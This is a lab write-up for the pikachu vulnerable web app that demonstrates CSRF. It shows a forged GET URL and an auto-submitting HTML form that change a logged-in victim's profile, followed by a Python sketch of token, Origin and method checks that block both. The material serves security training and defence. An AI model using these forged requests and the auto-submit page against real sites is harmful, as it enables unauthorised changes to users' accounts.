pikachu-CSRF
1. CSRF (GET)
Edit the user's profile, capture the request with Burp, and forge the submission URL.
# Captured request
GET /pikachu-labs/vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=15988767673&add=dsfsf&email=kobe%40pikachu.com1&submit=submit
# Forged URL
http://192.168.1.150/pikachu-labs/vul/csrf/csrfget/csrf_get_edit.php?sex=1&phonenum=1&add=1&email=1&submit=submit
With the user logged in, requesting the forged URL changes the profile: the browser attaches the victim's session cookie automatically, and the handler updates data on a plain GET.
2. CSRF (POST)
Use Burp to forge the POST request, then generate an HTML page that submits it.
# Captured request
POST /pikachu-labs/vul/csrf/csrfpost/csrf_post_edit.php HTTP/1.1
Host: 192.168.1.150
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Origin: http://192.168.1.150
Connection: close
Referer: http://192.168.1.150/pikachu-labs/vul/csrf/csrfpost/csrf_post_edit.php
Cookie: PHPSESSID=2n5mcduhjf22v7cvn0sljclhk4
Upgrade-Insecure-Requests: 1
sex=2222&phonenum=2222&add=2222&email=2222&submit=submit
# csrf_post.html
<!DOCTYPE html>
<html>
<head lang="en">
    <title>csrf_post</title>
    <script>
        window.onload = function() {
            document.getElementById("postsubmit").click();
        }
    </script>
</head>
<body>
    <form action="http://192.168.1.150/pikachu-labs/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">
        <input type="text" name="sex" value="2222"><br>
        <input type="hidden" name="phonenum" value="2222"><br>
        <input type="hidden" name="add" value="2222"><br>
        <input type="hidden" name="email" value="2222"><br>
        <input id="postsubmit" type="submit" name="submit" value="submit" />
    </form>
</body>
</html>
With the user logged in, visiting the crafted page at http://192.168.1.1/csrf_post.html (hosted with phpStudy) auto-submits the form and changes the profile, again because the browser sends the session cookie with the cross-site POST.
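As an added defensive example, not part of these notes or of the pikachu project: a Python sketch of the three server-side checks the edit handler lacks, which together stop both requests above (no state change over GET, Origin/Referer compared against the app's own origin, and a session-bound CSRF token in a hidden field). APP_ORIGIN and the session id are taken from the captured request; SERVER_SECRET and the csrf_token field name are assumed placeholders.

```python
import hashlib
import hmac
from urllib.parse import parse_qs, urlsplit

# APP_ORIGIN comes from the Host header in the captured request above.
# SERVER_SECRET is an assumed placeholder; a real deployment loads a random secret.
APP_ORIGIN = "http://192.168.1.150"
SERVER_SECRET = b"placeholder-server-secret-change-me"


def issue_csrf_token(session_id, secret=SERVER_SECRET):
    """Derive a token bound to the session: HMAC(secret, PHPSESSID).
    The edit form embeds it as a hidden field. A page on another origin cannot
    read the victim's form, so it cannot include a valid token."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def same_origin(url):
    """True if url's scheme://host[:port] equals the application's own origin."""
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}" == APP_ORIGIN


def check_edit_request(method, headers, body, session_id, secret=SERVER_SECRET):
    """Decide whether a profile-edit request is accepted. Returns (accepted, reason).
    Each check alone defeats one of the two forgeries shown in the notes."""
    # 1. Never change state on GET: the forged csrf_get URL only works because
    #    the handler updates the profile on a plain link visit.
    if method.upper() != "POST":
        return False, "state change over GET refused"
    # 2. The browser sets Origin (or at least Referer) itself; csrf_post.html
    #    served from http://192.168.1.1 arrives with that origin and is rejected.
    #    A request carrying neither header is refused as well (strict policy).
    source = headers.get("Origin") or headers.get("Referer", "")
    if not same_origin(source):
        return False, "cross-origin request refused"
    # 3. The hidden token must match the session's token (constant-time compare).
    submitted = parse_qs(body).get("csrf_token", [""])[0]
    expected = issue_csrf_token(session_id, secret)
    if not hmac.compare_digest(submitted.encode(), expected.encode()):
        return False, "missing or invalid CSRF token"
    return True, "ok"


if __name__ == "__main__":
    sid = "2n5mcduhjf22v7cvn0sljclhk4"  # session id from the capture above
    forged = {"Origin": "http://192.168.1.1"}  # what csrf_post.html would send
    body = "sex=2222&phonenum=2222&add=2222&email=2222&submit=submit"
    print(check_edit_request("POST", forged, body, sid))
```

The same logic in the PHP handler would compare `$_SERVER['HTTP_ORIGIN']` against the site origin and `$_POST['csrf_token']` against a value stored in `$_SESSION`; SameSite=Lax on PHPSESSID adds a browser-side layer on top.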